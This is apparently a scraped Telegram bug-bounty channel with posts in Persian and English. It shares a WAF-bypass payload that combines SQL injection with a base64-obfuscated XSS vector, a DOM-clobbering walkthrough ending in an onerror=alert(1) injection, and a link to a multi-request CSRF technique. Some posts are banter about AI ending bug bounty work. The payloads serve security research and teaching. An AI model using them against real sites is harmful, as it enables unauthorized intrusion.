Forwarded from
👍4❤2
https://gist.github.com/MEY-D/14e3a6449b340a8a2122d5e2b2ad662a
It’s a known technique, but it might still be useful.
It’s a known technique, but it might still be useful.
Gist
CSRF Multiple POST requests
CSRF Multiple POST requests. GitHub Gist: instantly share code, notes, and snippets.
❤5
BugBounty & Hacking Resources
https://gist.github.com/MEY-D/14e3a6449b340a8a2122d5e2b2ad662a It’s a known technique, but it might still be useful.
برای زمانی که نیاز دارید victim چند تا post ریکوست بفرسته
بدون اینکه از سایت attacker خارج بشه (و 1کلیک)
بدون اینکه از سایت attacker خارج بشه (و 1کلیک)
❤1
❤1
چقدر چنل باگ بانتی و امنیت زیاد شده😂
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
👍11❤6
Interesting way to bypass WAF when you need to use the </noscript> tag:
Inspired by: https://x.com/_0x999?s=21
The WAF first checks for SQLi, so ignore the comment section.
e.g:
https://x.com/neotrony/status/1931790830336884973?s=2
Inspired by: https://x.com/_0x999?s=21
meydi" or 1=/*</noscript>*/ -- - <XSS>
The WAF first checks for SQLi, so ignore the comment section.
e.g:
meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>
https://x.com/neotrony/status/1931790830336884973?s=2
❤7
تا الان استوری هایی که گذاشته شده خوب بوده یا نه نظر خود را اعلام کنید 👊
Anonymous Poll
82%
عالی ادامه بدید 🦍 🤣 ….
18%
ناموسن ادامه ندید ….☺️
❤1
“bug bounty as we know it probably dies.”
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
https://x.com/zseano/status/1932719746538996157?s=61
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
https://x.com/zseano/status/1932719746538996157?s=61
X (formerly Twitter)
zseano (@zseano) on X
@rez0__ “bug bounty as we know it probably dies.”
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
😢4🤔3
BugBounty & Hacking Resources
چقدر از این خبر کونتون ترسید ؟🦍
my personal opinion:
این واسه همه زمینه ها برقراره و فقط باگ بانتی نیس
و به نظر من کل cyber security جز اخرین ها هستش که از بین بره
در هرصورت تو این فرصت 10x کار کنید🫦
edit:
و با زیشانو در مورد تایم موافقم😬
این واسه همه زمینه ها برقراره و فقط باگ بانتی نیس
و به نظر من کل cyber security جز اخرین ها هستش که از بین بره
در هرصورت تو این فرصت 10x کار کنید
edit:
و با زیشانو در مورد تایم موافقم
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
This is how DOM clobbering works.
When you create an element with an id, the browser automatically creates a global variable for that ID:
Now
But when you create multiple elements with the same id:
Now
Add a name attribute:
And
Now combine that with a common JS pattern like:
This is meant to provide a fallback if the global doesn't exist. However, if
Now imagine this JS logic:
If an attacker clobbered
If HTML is set via innerHTML or similar, then this could render as:
When you create an element with an id, the browser automatically creates a global variable for that ID:
<a id="foo"></a>
Now
window.foopoints to that single element.
But when you create multiple elements with the same id:
<a id="foo"></a>
<a id="foo"></a>
Now
becomes an HTMLCollection, not a single element.
window.foo
Add a name attribute:
<a id="foo" name="bar" href="..."></a>
And
now points to that element (works in Chromium/WebKit browsers, but not Firefox).
window.foo.bar
Now combine that with a common JS pattern like:
var someObject = window.someObject || {};
This is meant to provide a fallback if the global doesn't exist. However, if
window.someObjecthas been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.
Now imagine this JS logic:
let imgSrc = someObject.avatar;
If an attacker clobbered
someObject.avatarwith:
<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>
If HTML is set via innerHTML or similar, then this could render as:
<img src="cid:" onerror="alert(1)//"">
❤7